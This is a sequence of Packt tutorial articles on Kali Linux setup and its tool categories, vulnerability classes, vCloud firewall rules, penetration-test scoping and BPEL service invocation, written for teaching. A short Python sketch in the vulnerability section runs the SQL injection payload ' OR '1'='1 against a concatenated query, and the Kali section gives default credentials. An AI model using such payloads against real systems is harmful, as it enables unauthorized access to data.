When you start Kali, you will be presented with a Boot Install screen. You may choose what type of installation (GUI-based or text-based) you would like to perform. Select the local language preference, country, and keyboard preferences. Select a hostname for the Kali Linux host; the default hostname is Kali. Select a password; simple passwords may not work, so choose something that has some degree of complexity. The next prompt asks for your time zone. Modify accordingly and select Continue. The next screenshot shows selecting Eastern Standard Time.

The installer will ask you to set up your partitions. If you are installing Kali on a virtual image, select Guided Install – Whole Disk. This will destroy all data on the disk and install Kali Linux; keep in mind that on a virtual machine, only the virtual disk is getting destroyed. Advanced users can select manual configuration to customize partitions. Kali also offers the option of using LVM (Logical Volume Manager), which allows you to manage and resize partitions after installation. In theory, it is supposed to allow flexibility when storage needs change after the initial installation; however, unless your Kali Linux needs are extremely complex, you most likely will not need to use it. The last window displays a review of the installation settings. If everything looks correct, select Yes to continue the process, as shown in the following screenshot.

Kali Linux uses central repositories to distribute application packages. If you would like to install these packages, you need to use a network mirror. The packages are downloaded via the HTTP protocol.
If your network uses a proxy server, you will also need to configure the proxy settings for your network.

Kali will prompt you to install GRUB. GRUB is a multi-boot loader that gives the user the ability to pick from, and boot into, multiple operating systems. In almost all cases, you should select to install GRUB. If you are configuring your system to dual boot, you will want to make sure GRUB recognizes the other operating systems, in order for it to give users the option to boot into an alternative operating system. If it does not detect any other operating systems, the machine will automatically boot into Kali Linux.

Congratulations! You have finished installing Kali Linux. You will want to remove all media (physical or virtual) and select Continue to reboot your system.

Kali Linux and VM image first run

On some Kali installation methods, you will be asked to set the root password. When Kali Linux boots up, enter root as the username along with the password you selected. If you downloaded a VM image of Kali, you will need the root password; the default username is root and the password is toor.

Kali toolset overview

Kali Linux offers a number of customized tools designed for Penetration Testing. The tools are categorized in the following groups, as seen in the drop-down menu shown in the following screenshot:

Information Gathering: These are Reconnaissance tools used to gather data on your target network and devices. The tools range from identifying devices to analyzing the protocols used.

Vulnerability Analysis: Tools from this section focus on evaluating systems for vulnerabilities. Typically, these are run against systems found using the Information Gathering Reconnaissance tools.

Web Applications: These are tools used to audit and exploit vulnerabilities in web servers. Many of the audit tools we will refer to in this article come directly from this category. However, web applications do not always refer to attacks against web servers; the category also includes web-based tools for networking services. For example, web proxies are found under this section.

Password Attacks: This section of tools primarily deals with brute forcing or the offline computation of passwords or shared keys used for authentication.

Wireless Attacks: These are tools used to exploit vulnerabilities found in wireless protocols. 802.11 tools are found here, including tools such as aircrack, airmon, and wireless password cracking tools. In addition, this section has tools related to RFID and Bluetooth vulnerabilities as well. In many cases, the tools in this section need to be used with a wireless adapter that Kali can put into promiscuous mode.

Exploitation Tools: These are tools used to exploit vulnerabilities found in systems. Usually, a vulnerability is identified during a Vulnerability Assessment of a target.

Sniffing and Spoofing: These are tools used for network packet captures, network packet manipulation, packet crafting applications, and web spoofing. There are also a few VoIP reconstruction applications.

Maintaining Access: Maintaining Access tools are used once a foothold is established in a target system or network. It is common to find compromised systems with multiple hooks back to the attacker, providing alternative routes in the event that a vulnerability used by the attacker is found and remediated.

Reverse Engineering: These tools are used to disassemble executables and debug programs.
The purpose of reverse engineering is analyzing how a program was developed, so that it can be copied or modified, or so that it can guide the development of other programs. Reverse engineering is also used for malware analysis, to determine what an executable does, or by researchers attempting to find vulnerabilities in software applications.

Stress Testing: Stress Testing tools are used to evaluate how much data a system can handle. Undesired outcomes can result from overloading systems, such as causing a device controlling network communication to open all communication channels, or a system shutting down (also known as a denial of service attack).

Hardware Hacking: This section contains Android tools, which could be classified as mobile, and Arduino tools, which are used for programming and controlling other small electronic devices.

Forensics: Forensics tools are used to monitor and analyze computer network traffic and applications.

Reporting Tools: Reporting tools are methods used to deliver the information found during a penetration exercise.

System Services: This is where you can enable and disable Kali services. The services are grouped into BeEF, Dradis, HTTP, Metasploit, MySQL, and SSH.

Summary

This article served as an introduction to Penetration Testing web applications and an overview of setting up Kali Linux. We started off by defining best practices for performing Penetration Testing services, including defining risk and the differences between various services. The key takeaways are understanding what makes a Penetration Test different from other security services, how to properly scope a level of service, and the best methods for performing the services. Positioning the right expectations up front with a potential client will better qualify the opportunity and simplify the development of an acceptable scope of work.

This article continued by providing an overview of Kali Linux. Topics included how to download your desired version of Kali Linux, ways to perform the installation, and a brief overview of the toolsets available. The next article will cover how to perform Reconnaissance on a target. This is the first and most critical step in delivering Penetration Testing services.

Resources for Article:

Further resources on this subject:

BackTrack 4: Security with Penetration Testing Methodology [Article]
CISSP: Vulnerability and Penetration Testing for Access Control [Article]
Making a Complete yet Small Linux Distribution [Article]

CISSP: Vulnerability and Penetration Testing for Access Control

Packt
12 Mar 2010
6 min read
IT components such as operating systems, application software, and even networks have many vulnerabilities. These vulnerabilities are open to compromise or exploitation, which creates the possibility of penetration into the systems that may result in unauthorized access and a compromise of the confidentiality, integrity, and availability of information assets. Vulnerability tests are performed to identify vulnerabilities, while penetration tests are conducted to check the following:

The possibility of compromising the systems such that the established access control mechanisms may be defeated and unauthorized access is gained

Whether the systems can be shut down, or overloaded with malicious data using techniques such as DoS attacks, to the point where access by legitimate users or processes may be denied

Vulnerability assessment and penetration testing processes are like IT audits; therefore, it is preferred that they are performed by third parties. The primary purpose of vulnerability and penetration tests is to identify, evaluate, and mitigate the risks due to vulnerability exploitation.

Vulnerability assessment

Vulnerability assessment is a process in which IT systems, such as computers and networks, and software, such as operating systems and application software, are scanned in order to identify the presence of known and unknown vulnerabilities. Vulnerabilities in IT systems such as software and networks can be considered holes or errors. These vulnerabilities are due to improper software design, insecure coding, or both.

For example, buffer overflow is a vulnerability where the boundary limits for an entity, such as a variable or constant, are not properly defined or checked. It can be exploited by supplying data greater than what the entity can hold. This results in a memory spill-over into other areas, thereby corrupting the instructions or code that the microprocessor needs to process. When a vulnerability is exploited, it results in a security violation, which in turn has an impact. A security violation may be unauthorized access, an escalation of privileges, or a denial of service to the IT systems.

Tools are used in the process of identifying vulnerabilities. These tools are called vulnerability scanners. A vulnerability scanning tool can be hardware-based or a software application.

Generally, vulnerabilities can be classified based on the type of security error. A type is the root cause of the vulnerability. Vulnerabilities can be classified into the following types:

Access Control Vulnerabilities: An error due to the lack of enforcement pertaining to users or functions that are permitted, or denied, access to an object or a resource.

Examples: Improper or missing access control lists or tables; no privilege model; inadequate file permissions; improper or weak encoding

Security violation and impact: Files, objects, or processes can be accessed directly without authentication or routing.

Authentication Vulnerabilities: An error due to inadequate identification mechanisms, so that a user or a process is not correctly identified.
Examples: Weak or static passwords; improper or weak encoding, or weak algorithms

Security violation and impact: An unauthorized or less privileged user (for example, a Guest user) or a less privileged process gains higher privileges, such as administrative or root access, to the system.

Boundary Condition Vulnerabilities: An error due to inadequate checking and validation mechanisms, such that the length of data is not checked or validated against the size of the data storage or resource.

Examples: Buffer overflow; overwriting the original data in memory

Security violation and impact: Memory is overwritten with arbitrary code, so that the attacker gains access to programs or corrupts the memory. This will ultimately crash the operating system. An unstable system caused by memory corruption may be exploited to get command prompt or shell access by injecting arbitrary code.

Configuration Weakness Vulnerabilities: An error due to the improper configuration of system parameters, or leaving default configuration settings as they are, which may not be secure.

Examples: Default security policy configuration; file and print access in Internet connection sharing

Security violation and impact: Most of the default configuration settings of many software applications are published and available in the public domain. For example, some applications ship with standard default passwords. If they are not secured, they allow an attacker to compromise the system. Configuration weaknesses are also exploited to gain higher privileges, resulting in privilege escalation.

Exception Handling Vulnerabilities: An error due to improper setup or coding, where the system fails to handle, or properly respond to, exceptional or unexpected data or conditions.

Example: SQL injection

Security violation and impact: By injecting exceptional data, user credentials can be captured by an unauthorized entity.

Input Validation Vulnerabilities: An error due to a lack of verification mechanisms to validate input data or contents.

Examples: Directory traversal; malformed URLs

Security violation and impact: Due to poor input validation, access to system-privileged programs may be obtained.

Randomization Vulnerabilities: An error due to a mismatch in random data, or insufficient randomness in the data used by a process. These vulnerabilities predominantly relate to encryption algorithms.

Examples: Weak encryption keys; insufficient random data

Security violation and impact: A cryptographic key can be compromised, which will impact data and access security.

Resource Vulnerabilities: An error due to a lack of resource availability for correct operations or processes.

Examples: Memory getting full; CPU being completely utilized

Security violation and impact: Due to the lack of resources, the system becomes unstable or hangs. This results in a denial of service to legitimate users.

State Errors: An error that results from a lack of state maintenance due to incorrect process flows.

Example: Opening multiple tabs in web browsers

Security violation and impact: There are specific security attacks, such as Cross-site scripting (XSS), that can result in user-authenticated sessions being hijacked.
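To make one of these categories concrete, here is a minimal sketch of the SQL injection flaw named under the exception handling and input validation categories, using an in-memory SQLite database and invented table data, alongside the parameterized query that prevents it:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

attacker_input = "' OR '1'='1"  # classic injection payload

# Vulnerable: user input is concatenated straight into the SQL text,
# so the payload rewrites the WHERE clause and matches every row
unsafe = f"SELECT * FROM users WHERE name = '{attacker_input}'"
print("unsafe query returns:", conn.execute(unsafe).fetchall())

# Safe: a parameterized query treats the payload as a literal string
safe = "SELECT * FROM users WHERE name = ?"
print("safe query returns:", conn.execute(safe, (attacker_input,)).fetchall())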
Information security professionals need to be aware of the processes involved in identifying system vulnerabilities. It is important to devise suitable countermeasures, in a cost-effective and efficient way, to reduce the risk associated with the identified vulnerabilities. Some such measures are applying the patches supplied by application vendors and hardening the systems.


Securing vCloud Using the vCloud Networking and Security App Firewall

Packt
12 Nov 2013
6 min read
(For more resources related to this topic, see here.)

Creating a vCloud Networking and Security App firewall rule

In this article, we will create a VMware vCloud Networking and Security App firewall rule that restricts inbound HTTP traffic destined for a web server:

1. Open the vCloud Networking and Security Manager URL in a supported browser; it can also be accessed from the vCenter client.
2. Log in to vCloud Networking and Security as admin.
3. In the vCloud Networking and Security Manager inventory pane, go to Datacenters | Your Datacenter.
4. In the right-hand pane, click on the App Firewall tab.
5. Click on the Networks link.
6. On the General tab, click on the + link.
7. Point to the new rule Name cell and click on the + icon.
8. In the rule Name panel, type Deny HTTP in the textbox and click on OK.
9. Point to the Destination cell and click on the + icon.
10. In the input panel, perform the following actions: go to IP Addresses from the drop-down menu; at the bottom of the panel, click on the New IP Addresses link; in the Add IP Addresses panel, configure an address set that includes the web server; click on OK.
11. Point to the Service cell and click on the + icon.
12. In the input panel, perform the following actions: sort the Available list by name; scroll down and go to the HTTP service checkbox; click on the blue right-arrow to move the HTTP service from the Available list to the Selected list; click on OK.
13. Go to the Action cell and click on the + icon.
14. In the input panel, click on Block and Log.
15. Click on OK.
16. Click on the Publish Changes button, located above the rules list, on the green bar.

In general, create firewall rules that meet your business needs. In addition, you might consider the following guidelines:

Where possible, when identifying the source and destination, take advantage of vSphere groupings in your vCenter Server inventory, such as the datacenter, cluster, and vApp. By writing rules in terms of these groupings, the number of firewall rules is reduced, which makes the rules easier to track and less prone to configuration errors.

If a vSphere grouping does not suit your needs because you need to create a more specialized group, take advantage of security groups. Like vSphere groupings, security groups reduce the number of rules that you need to create, making the rules easier to track and maintain.

Finally, set the action on the default firewall rules based on your business policy. For example, as a security best practice, you might deny all traffic by default. If all traffic is denied, vCloud Networking and Security App drops all incoming and outgoing traffic. Allowing all traffic by default makes your datacenter very accessible, but also insecure.

vCloud Networking and Security App – flow monitoring

Flow monitoring is a traffic analysis tool that provides a detailed view of the traffic on your virtual network that has passed through a vCloud Networking and Security App. The flow monitoring output defines which machines are exchanging data and over which application. This data includes the number of sessions, packets, and bytes transmitted per session. Session details include sources, destinations, the direction of sessions, applications, and the ports used. Session details can be used to create firewall rules to allow or block traffic. You can use flow monitoring as a forensic tool to detect rogue services and examine outbound sessions.
The main advantages of flow monitoring are:

You can easily analyze inter-VM traffic
Dynamic rules can be created right from the flow monitoring console
You can use it to debug network-related problems, as you can enable logging for every individual virtual machine on an as-needed basis

You can view the traffic sessions inspected by a vCloud Networking and Security App within a specified time span. The last 24 hours of data are displayed by default; the minimum time span is 1 hour and the maximum is 2 weeks. The bar at the top of the page shows the percentage of allowed traffic in green and blocked traffic in red.

Examining flow monitoring statistics

Let us examine the statistics for the Top Flows, Top Destinations, and Top Sources categories:

1. Open the vCloud Networking and Security Manager URL in a supported browser.
2. Log in to vCloud Networking and Security as admin.
3. In the vCloud Networking and Security Manager inventory pane, go to Datacenters | Your Datacenter.
4. In the right-hand pane, click on the Network Virtualization link.
5. Click on the Networks link.
6. In the networks list, click on the network where you want to monitor the flow.
7. Click on the Flow Monitoring button.
8. Verify that Flow Monitoring | Summary is selected.
9. On the far right side of the page, across from the Summary and Details links, click on the Time Interval Change link.
10. On the Time Interval panel, select the Last 1 week radio button and click on Update.
11. Verify that the Top Flows button is selected.
12. Use the Top Flows table to determine which flow has the highest volume of bytes and which flow has the highest volume of packets.
13. Use the mouse wheel or the vertical scroll bar to view the graph. Point to the apex of three different colored lines and determine which network protocol is reported.
14. Scroll to the top of the form and click on the Top Destinations button.
15. Use the Top Destinations table to determine which destination has the highest volume of incoming bytes and which destination has the highest volume of packets.
16. Use the mouse wheel or the vertical scroll bar to view the graph.
17. Scroll to the top of the form and click on the Top Sources button.
18. Use the Top Sources table to determine which source has the highest volume of bytes and which source has the highest volume of packets.
19. Use the mouse wheel or the vertical scroll bar to view the graph.

Summary

In this article, we learned how to create access control policies based on logical constructs, such as VMware vCenter Server containers and VMware vCloud Networking and Security security groups, and not just physical constructs such as IP addresses.

Resources for Article:

Further resources on this subject:

Windows 8 with VMware View [Article]
VMware View 5 Desktop Virtualization [Article]
Cloning and Snapshots in VMware Workstation [Article]


Assessment Planning

Packt
04 Jan 2016
12 min read
In this article by Kevin Cardwell, the author of the book Advanced Penetration Testing for Highly-Secured Environments – Second Edition, we discuss the test environment and how we have selected the chosen platform. We will discuss the following:

Introduction to advanced penetration testing
How to successfully scope your testing

(For more resources related to this topic, see here.)

Introduction to advanced penetration testing

Penetration testing is necessary to determine the true attack footprint of your environment. It may often be confused with vulnerability assessment, and thus it is important that the differences are fully explained to your clients.

Vulnerability assessments

Vulnerability assessments are necessary for discovering potential vulnerabilities throughout the environment. There are many tools available that automate this process, so that even an inexperienced security professional or administrator can effectively determine the security posture of their environment. Depending on scope, additional manual testing may also be required. Full exploitation of systems and services is not generally in scope for a normal vulnerability assessment engagement. Systems are typically enumerated and evaluated for vulnerabilities, and testing can often be done with or without authentication. Most vulnerability management and scanning solutions provide actionable reports that detail mitigation strategies, such as applying missing patches or correcting insecure system configurations.

Penetration testing

Penetration testing expands upon vulnerability assessment efforts by introducing exploitation into the mix. The risk of accidentally causing an unintentional denial of service or other outage is moderately higher when conducting a penetration test than it is when conducting vulnerability assessments. To an extent, this can be mitigated by proper planning and a solid understanding of the technologies involved during the testing process. Thus, it is important that the penetration tester continually updates and refines the necessary skills.

Penetration testing allows the business to understand whether the mitigation strategies employed are actually working as expected; it essentially takes the guesswork out of the equation. The penetration tester will be expected to emulate the actions that an attacker would attempt, and will be challenged with proving that they were able to compromise the critical systems targeted. The most successful penetration tests result in the penetration tester being able to prove, without a doubt, that the vulnerabilities that are found will lead to a significant loss of revenue unless properly addressed. Think of the impact that you would have if you could prove to the client that practically anyone in the world has easy access to their most confidential information!

Penetration testing requires a higher skill level than is needed for vulnerability analysis. This generally means that the price of a penetration test will be much higher than that of a vulnerability analysis. If you are unable to penetrate the network, you will be assuring your clientele that their systems are secure to the best of your knowledge. If you want to be able to sleep soundly at night, I recommend that you go above and beyond in verifying the security of your clients.

Advanced penetration testing

Some environments will be more secure than others.
You will be faced with environments that use:

Effective patch management procedures
Managed system configuration hardening policies
Multi-layered DMZs
Centralized security log management
Host-based security controls
Network intrusion detection or prevention systems
Wireless intrusion detection or prevention systems
Web application intrusion detection or prevention systems

Effective use of these controls increases the difficulty level of a penetration test significantly. Clients need to have complete confidence that these security mechanisms and procedures are able to protect the integrity, confidentiality, and availability of their systems. They also need to understand that, at times, the reason an attacker is able to compromise a system is due to configuration errors or poorly designed IT architecture.

Note that there is no such thing as a panacea in security. As penetration testers, it is our duty to look at all angles of the problem and make the client aware of anything that allows an attacker to adversely affect their business.

Advanced penetration testing goes above and beyond standard penetration testing by taking advantage of the latest security research and exploitation methods available. The goal should be to prove that sensitive data and systems are protected even from a targeted attack and, if that is not the case, to ensure that the client is provided with the proper instruction on what needs to be changed to make it so. A penetration test is a snapshot of the current security posture; penetration testing should be performed on a continual basis.

Many exploitation methods are poorly documented, frequently hard to use, and require hands-on experience to execute effectively and efficiently. At DefCon 19, Bruce "Grymoire" Barnett provided an excellent presentation on "Deceptive Hacking", in which he discussed how hackers use many of the very same techniques used by magicians. This is exactly the tenacity that penetration testers must assume as well. Only through dedication, effort, practice, and the willingness to explore unknown areas will penetration testers be able to mimic the targeted attack types that a malicious hacker would attempt in the wild.

Oftentimes you will be required to work on these penetration tests as part of a team, and you will need to know how to use the tools that are available to make this process more endurable and efficient. This is yet another challenge presented to today's pentesters. Working in a silo is just not an option when your scope restricts you to a very limited testing period. In some situations, companies may use non-standard methods of securing their data, which makes your job even more difficult. The complexity of their security systems working in tandem with each other may actually be the weakest link in their security strategy. The likelihood of finding exploitable vulnerabilities is directly proportional to the complexity of the environment being tested.

Before testing begins

Before we commence with testing, there are requirements that must be taken into consideration. You will need to determine the proper scoping of the test, the timeframes and restrictions, the type of testing (White box or Black box), and how to deal with third-party equipment and IP space.

Determining scope

Before you can accurately determine the scope of the test, you will need to gather as much information as possible. It is critical that the following is fully understood prior to starting testing procedures:

Who has the authority to authorize testing?
What is the purpose of the test?

What is the proposed timeframe for the testing? Are there any restrictions as to when the testing can be performed?

Does your customer understand the difference between a vulnerability assessment and a penetration test?

Will you be conducting this test with, or without, the cooperation of the IT security operations team? Are you testing their effectiveness?

Is social engineering permitted? How about denial-of-service attacks?

Are you able to test physical security measures used to secure servers, critical data storage, or anything else that requires physical access? For example, lock picking, impersonating an employee to gain entry into a building, or just generally walking into areas that the average unaffiliated person should not have access to.

Are you allowed to see the network documentation, or to be informed of the network architecture prior to testing, to speed things along? (This is not necessarily recommended, as it may instill doubt about the value of your findings. Most businesses do not expect this to be easy information to determine on your own.)

What are the IP ranges that you are allowed to test against? There are laws against scanning and testing systems without proper permission. Be extremely diligent when ensuring that these devices and ranges actually belong to your client, or you may be in danger of facing legal ramifications.

What are the physical locations of the company? This is more valuable to you as a tester if social engineering is permitted, because it ensures that you are at the sanctioned buildings when testing. If time permits, you should let your clients know if you were able to access any of this information publicly, in case they were under the impression that their locations were secret or difficult to find.

What should be done if there is a problem, or if the initial goal of the test has been reached? Will you continue to test to find more entry points, or is the testing over? This part is critical, and ties into the question of why the customer wants a penetration test in the first place.

Are there legal implications that you need to be aware of, such as systems that are in different countries, and so on? Not all countries have the same laws when it comes to penetration testing.

Will additional permission be required once a vulnerability has been exploited? This is important when performing tests on segmented networks. The client may not be aware that you can use internal systems as pivot points to delve deeper within their network.

How are databases to be handled? Are you allowed to add records, users, and so on?

This listing is not all-inclusive, and you may need to add items to the list depending on the requirements of your clients. Much of this data can be gathered directly from the client, but some will have to be handled by your team.

If there are legal concerns, it is recommended that you seek legal counsel to ensure you fully understand the implications of your testing. It is better to have too much information than not enough once the time comes to begin testing. In any case, you should always verify for yourself that the information you have been given is accurate. You do not want to find out that the systems you have been accessing do not actually fall under the authority of the client!

It is of utmost importance to gain proper authorization in writing before accessing any of your client's systems. Failure to do so may result in legal action and possibly jail. Use proper judgment!
You should also consider that errors and omissions insurance is a necessity when performing penetration testing.

Setting limits – nothing lasts forever

Setting proper limitations is essential if you want to be successful at performing penetration testing. Your clients need to understand the full ramifications involved, and should be made aware of any residual costs incurred if additional services beyond those listed within the contract are needed.

Be sure to set defined start and end dates for your services. Clearly define the rules of engagement, and include IP ranges, buildings, hours, and so on that may need to be tested. If it is not in your rules of engagement documentation, it should not be tested. Meetings should be predefined prior to the start of testing, and the customer should know exactly what your deliverables will be.

Rules of engagement documentation

Every penetration test will need to start with a rules of engagement document that all involved parties must have. This document should, at a minimum, cover the following items:

- Proper permissions by appropriate personnel.
- Begin and end dates for your testing.
- The type of testing that will be performed.
- Limitations of testing. What type of testing is permitted? DDoS? Full penetration? Social engineering? These questions need to be addressed in detail. Can intrusive tests as well as unobtrusive testing be performed? Does your client expect cleanup to be performed afterwards, or is this a staging environment that will be completely rebuilt after testing has been completed?
- IP ranges and physical locations to be tested.
- How the report will be transmitted at the end of the test. (Use secure means of transmission!)
- Which tools will be used during the test? Do not limit yourself to only one specific tool; it may be beneficial to provide a list of the primary toolset to avoid confusion in the future. For example, we will use the tools found in the most recent edition of the Kali suite.
- Let your client know how any illegal data found during testing will be handled: law enforcement should be contacted prior to the client. Please be sure to fully understand the laws in this regard before conducting your test.
- How sensitive information will be handled: you should not be downloading sensitive customer information; there are other methods of proving that the client's data is not secured. This is especially important when regulated data is a concern.
- Important contact information for both your team and for the key employees of the company you are testing.
- An agreement of what you will do to ensure the customer's system information does not remain on unsecured laptops and desktops used during testing. Will you need to properly scrub your machine after this testing?
- What do you plan to do with the information you gathered? Is it to be kept somewhere for future testing? Make sure this has been addressed before you start testing, not after.

The rules of engagement should contain all the details that are needed to determine the scope of the assessment. Any questions should have been answered prior to drafting your rules of engagement to ensure there are no misunderstandings once the time comes to test.

Your team members need to keep a copy of this signed document on their person at all times when performing the test. Imagine you have been hired to assess the security posture of a client's wireless network and you are stealthily creeping along the parking lot on private property with your gigantic directional Wi-Fi antenna and a laptop.
If someone witnesses you in this act, they will probably be concerned and call the authorities. You will need to have something on you that documents that you have a legitimate reason to be there. This is one time where having the contact information of the business leaders who hired you will come in extremely handy!

Summary

In this article, we focused on all that is necessary to prepare and plan for a successful penetration test. We discussed the differences between penetration testing and vulnerability assessments. The steps involved with proper scoping were detailed, as were the necessary steps to ensure all information has been gathered prior to testing. One thing to remember is that proper scoping and planning are just as important as ensuring you test against the latest and greatest vulnerabilities.

Resources for Article:

Further resources on this subject:

- Penetration Testing [article]
- Penetration Testing and Setup [article]
- BackTrack 4: Security with Penetration Testing Methodology [article]

test-article

Packt
16 Jul 2014
13 min read
Service Invocation

Time for action – creating the book warehousing process

Let's create the BookWarehousingBPEL BPEL process:

1. We will open the SOA composite by double-clicking on the Bookstore in the process tree. In the composite, we can see both Bookstore BPEL processes and their WSDL interfaces.
2. We will add a new BPEL process by dragging-and-dropping the BPEL Process service component from the right-hand side toolbar. An already-familiar dialog window will open, where we will specify the BPEL 2.0 version, enter the process name as BookWarehousingBPEL, modify the namespace to http://packtpub.com/Bookstore/BookWarehousingBPEL, and select Synchronous BPEL Process. We will leave all other fields at their default values. (Figure: 8963EN_02_03.png)
3. Next, we will wire the BookWarehousingBPEL component with the BookstoreABPEL and BookstoreBBPEL components. This way, we will establish a partner link between them. First, we will create the wire to the BookstoreBBPEL component (although the order doesn't matter). To do this, you have to click on the bottom-right side of the component. Once you place the mouse pointer above the component, circles on the edges will appear. You need to start with the circle labelled Drag to add a new Reference and connect it with the service interface circle, as shown in the following figure. (Figure: 8963EN_02_04.png)
4. You do the same to wire the BookWarehousingBPEL component with the BookstoreABPEL component. (Figure: 8963EN_02_05.png)
5. We should see the following composite. Please notice that the BookWarehousingBPEL component is wired to the BookstoreABPEL and BookstoreBBPEL components. (Figure: 8963EN_02_06.png)

What just happened?

We have added the BookWarehousingBPEL component to our SOA composite and wired it to the BookstoreABPEL and BookstoreBBPEL components. Creating the wires between components means that references have been created and relations between components have been established. In other words, we have expressed that the BookWarehousingBPEL component will be able to invoke the BookstoreABPEL and BookstoreBBPEL components. This is exactly what we want to achieve with our BookWarehousingBPEL process, which will orchestrate both bookstore BPELs. Once we have created the components and wired them accordingly, we are ready to implement the BookWarehousingBPEL process.

What just happened?

We have implemented the process flow logic for the BookWarehousingBPEL process. It actually orchestrated two other services. It invoked the BookstoreA and BookstoreB BPEL processes that we've developed in the previous chapter. Here, these two BPEL processes acted like services.

First, we have created the XML schema elements for the request and response messages of the BPEL process. We have created four variables: BookstoreARequest, BookstoreAResponse, BookstoreBRequest, and BookstoreBResponse. The BPEL code for the variable declaration looks like the code shown in the following screenshot. (Figure: 8963EN_02_18b.png)

Then, we have added the <assign> activity to prepare a request for both the bookstore BPEL processes, copying the BookData element from inputVariable to the BookstoreARequest and BookstoreBRequest variables. The following BPEL code has been generated. (Figure: 8963EN_02_18c.png)

Next, we have invoked both the bookstore BPEL services using the <invoke> activity.
The BPEL source code reads like the following screenshot. (Figure: 8963EN_02_18d.png)

Finally, we have added the <if> activity to select the bookstore with the lowest stock quantity. (Figure: 8963EN_02_18e.png)

With this, we have concluded the development of the book warehousing BPEL process and are ready to deploy and test it.

Deploying and testing the book warehousing BPEL

We will deploy the project to the SOA Suite process server the same way as we did in the previous chapter, by right-clicking on the project and selecting Deploy. Then, we will navigate through the options. As we redeploy the whole SOA composite, make sure the Overwrite option is selected. You should check whether the compilation and the deployment have been successful.

Then, we will log in to the Enterprise Manager console, select the project bookstore, and click on the Test button. Be sure to select bookwarehousingbpel_client for the test. After entering the parameters, we can click on the Test Web Service button to initiate the BPEL process, and we should receive an answer (Bookstore A or Bookstore B, depending on the data that we have entered).

Remember that our BookWarehousingBPEL process actually orchestrated two other services. It invoked the BookstoreA and BookstoreB BPEL processes. To verify this, we can launch the flow trace (click on the Launch Flow Trace button) in the Enterprise Manager console, and we will see that the two bookstore BPEL processes have been invoked. (Figure: 8963EN_02_19.png)

An even more interesting view is the flow view, which also shows that both bookstore services have been invoked. Click on BookWarehousingBPEL to open up the audit trail. (Figure: 8963EN_02_20.png)

Understanding partner links

When invoking services, we have often mentioned partner links. Partner links denote all the interactions that a BPEL process has with external services. There are two possibilities:

- The BPEL process invokes operations on other services.
- The BPEL process receives invocations from clients. One of the clients is the user of the BPEL process, who makes the initial invocation. Other clients are services, for example, those that have been invoked by the BPEL process, but may return replies.

Links to all the parties that BPEL interacts with are called partner links. Partner links can be links to services that are invoked by the BPEL process. These are sometimes called invoked partner links. Partner links can also be links to clients that can invoke the BPEL process. Such partner links are sometimes called client partner links.

Note that each BPEL process has at least one client partner link, because there has to be a client that first invokes the BPEL process. Usually, a BPEL process will also have several invoked partner links, because it will most likely invoke several services. In our case, the BookWarehousingBPEL process has one client partner link and two invoked partner links, BookstoreABPEL and BookstoreBBPEL. You can observe this on the SOA composite design view and on the BPEL process itself, where the client partner links are located on the left-hand side, while the invoked partner links are located on the right-hand side of the design view.

Partner link types

Describing situations where the service is invoked by the process and vice versa requires selecting a certain perspective. We can select the process perspective and describe the process as requiring portTypeA on the service and providing portTypeB to the service.
Alternatively, we select the service perspective and describe the service as offering portTypeA to the BPEL process and requiring portTypeB from the process.

Partner link types allow us to model such relationships as a third party. We are not required to take a certain perspective; rather, we just define roles. A partner link type must have at least one role and can have at most two roles. The latter is the usual case. For each role, we must specify a portType that is used for interaction. Partner link types are defined in the WSDLs. If we take a closer look at the BookWarehousingBPEL.wsdl file, we can see the partner link type definition. (Figure: 8963EN_02_22.png)

If we specify only one role, we express the willingness to interact with the service, but do not place any additional requirements on the service. Sometimes, existing services will not define a partner link type. Then, we can wrap the WSDL of the service and define partner link types ourselves.

Now that we have become familiar with partner link types and know that they belong to WSDL, it is time to go back to the BPEL process definition, more specifically to the partner links.

Defining partner links

Partner links are concrete references to services that a BPEL business process interacts with. They are specified near the beginning of the BPEL process definition document, just after the <process> tag. Several <partnerLink> definitions are nested within the <partnerLinks> element:

<process ...>
   <partnerLinks>
      <partnerLink ... />
      <partnerLink ... />
      ...
   </partnerLinks>
   <sequence>
      ...
   </sequence>
</process>

For each partner link, we have to specify the following:

- name: This serves as a reference for interactions via that partner link.
- partnerLinkType: This defines the type of the partner link.
- myRole: This indicates the role of the BPEL process itself.
- partnerRole: This indicates the role of the partner.
- initializePartnerRole: This indicates whether the BPEL engine should initialize the partner link's partner role value. This is an optional attribute and should only be used with partner links that specify the partner role.

We define both roles (myRole and partnerRole) only if the partnerLinkType specifies two roles. If the partnerLinkType specifies only one role, the partnerLink also has to specify only one role; we omit the one that is not needed.

Let's go back to our example, where we have defined the BookstoreABPEL partner link type. To define a partner link, we need to specify the partner roles, because it is a synchronous relation. The definition is shown in the corresponding code excerpt. (Figure: 8963EN_02_23.png)

With this, we have concluded the discussion on partner links and partner link types. We will continue with the parallel service invocation.

Parallel service invocation

BPEL also supports parallel service invocation. In our example, we have invoked Bookstore A and Bookstore B sequentially. This way, we need to wait for the response from the first service and then for the response from the second service. If these services take longer to execute, the response times add up. If we invoke both services in parallel, we only need to wait for the duration of the longer-lasting call.

BPEL has several possibilities for parallel flows, which will be described in detail in Chapter 8, Dynamic Parallel Invocations. Here, we present the basic parallel service invocation using the <flow> activity.
(Figure: 8963EN_02_24.png)

To invoke services in parallel, or to perform any other activities in parallel, we can use the <flow> activity. Within the <flow> activity, we can nest an arbitrary number of flows, and all will execute in parallel. Let's try to modify our example so that Bookstore A and B will be invoked in parallel.

Time for action – developing parallel flows

Let's now modify the BookWarehousingBPEL process so that the BookstoreA and BookstoreB services will be invoked in parallel. We should do the following:

1. To invoke the BookstoreA and BookstoreB services in parallel, we need to add the Flow structured activity to the process flow just before the first invocation. (Figure: 8963EN_02_25.png)
2. We see that two parallel branches have been created. We simply drag-and-drop both invoke activities into the parallel branches. (Figure: 8963EN_02_26.png)
3. That's all! We can create more parallel branches if we need to, by clicking on the Add Sequence icon.

What just happened?

We have modified the BookWarehousingBPEL process so that the BookstoreA and BookstoreB <invoke> activities are executed in parallel. A corresponding <flow> activity has been created in the BPEL source code. Within the <flow> activity, both <invoke> activities are nested. Please notice that each <invoke> activity is placed within its own <sequence> activity. This would make sense if we required more than one activity in each parallel branch. The BPEL source code looks like the one shown in the following screenshot. (Figure: 8963EN_02_27.png)

Deploying and testing the parallel invocation

